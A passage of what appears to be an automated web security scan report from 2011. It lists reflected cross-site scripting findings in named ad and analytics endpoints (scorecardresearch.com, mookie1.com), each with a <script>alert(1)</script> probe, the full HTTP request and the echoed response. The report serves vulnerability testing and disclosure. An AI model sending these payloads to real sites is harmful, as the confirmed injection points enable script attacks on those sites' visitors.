Date: Tue, 19 Jul 2011 20:42:57 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"83b34b<script>alert(1)</script>bfb92715a68", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});

4.36. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 47da7<script>alert(1)</script>399492637bb was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=28159&c6=&c10=17426647da7<script>alert(1)</script>399492637bb&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:01 GMT
Date: Tue, 19 Jul 2011 20:43:01 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"17426647da7<script>alert(1)</script>399492637bb", c15:"", c16:"", r:""});

4.37. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload e0738<script>alert(1)</script>71db0b72094 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=28159&c6=&c10=174266&c15=e0738<script>alert(1)</script>71db0b72094 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:03 GMT
Date: Tue, 19 Jul 2011 20:43:03 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"e0738<script>alert(1)</script>71db0b72094", c16:"", r:""});

4.38. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 339fa<script>alert(1)</script>4092f63da71 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113339fa<script>alert(1)</script>4092f63da71&c3=37&c4=16565&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:58 GMT
Date: Tue, 19 Jul 2011 20:42:58 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113339fa<script>alert(1)</script>4092f63da71", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});

4.39. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d6c50<script>alert(1)</script>bbe75eec2e7 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37d6c50<script>alert(1)</script>bbe75eec2e7&c4=16565&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:59 GMT
Date: Tue, 19 Jul 2011 20:42:59 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"37d6c50<script>alert(1)</script>bbe75eec2e7", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});

4.40. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 35e59<script>alert(1)</script>27cddba7723 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=1656535e59<script>alert(1)</script>27cddba7723&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:59 GMT
Date: Tue, 19 Jul 2011 20:42:59 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"1656535e59<script>alert(1)</script>27cddba7723", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});

4.41. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 23c60<script>alert(1)</script>d682f2287ec was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=2815923c60<script>alert(1)</script>d682f2287ec&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:00 GMT
Date: Tue, 19 Jul 2011 20:43:00 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"2815923c60<script>alert(1)</script>d682f2287ec", c6:"", c10:"174266", c15:"", c16:"", r:""});

4.42. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e35be<script>alert(1)</script>6f8f21388b6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=28159&c6=e35be<script>alert(1)</script>6f8f21388b6&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:01 GMT
Date: Tue, 19 Jul 2011 20:43:01 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"e35be<script>alert(1)</script>6f8f21388b6", c10:"174266", c15:"", c16:"", r:""});

4.43. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73600"><script>alert(1)</script>cf1843363ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Ticketmaster73600"><script>alert(1)</script>cf1843363ea/LN/RTG_SX_NonSecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster73600"><script>alert(1)</script>cf1843363ea/LN/RTG_SX_NonSecure/503274606/Bottom3/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.44. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1793"><script>alert(1)</script>21638686707 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Ticketmaster/LNd1793"><script>alert(1)</script>21638686707/RTG_SX_NonSecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster/LNd1793"><script>alert(1)</script>21638686707/RTG_SX_NonSecure/1619248060/Bottom3/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.45. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14063"><script>alert(1)</script>f058737c3cd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom314063"><script>alert(1)</script>f058737c3cd HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster/LN/RTG_SX_NonSecure/1162924129/Bottom314063"><script>alert(1)</script>f058737c3cd/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.46. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/172548/11408426983@x01

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a690"><script>alert(1)</script>6745bff7060 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster7a690"><script>alert(1)</script>6745bff7060/172548/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 339
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster7a690"><script>alert(1)</script>6745bff7060/172548/1739368303/x01/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.47. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/172548/11408426983@x01

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99dac"><script>alert(1)</script>68532547002 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/17254899dac"><script>alert(1)</script>68532547002/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/17254899dac"><script>alert(1)</script>68532547002/L12/79868710/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank">
...[SNIP]...

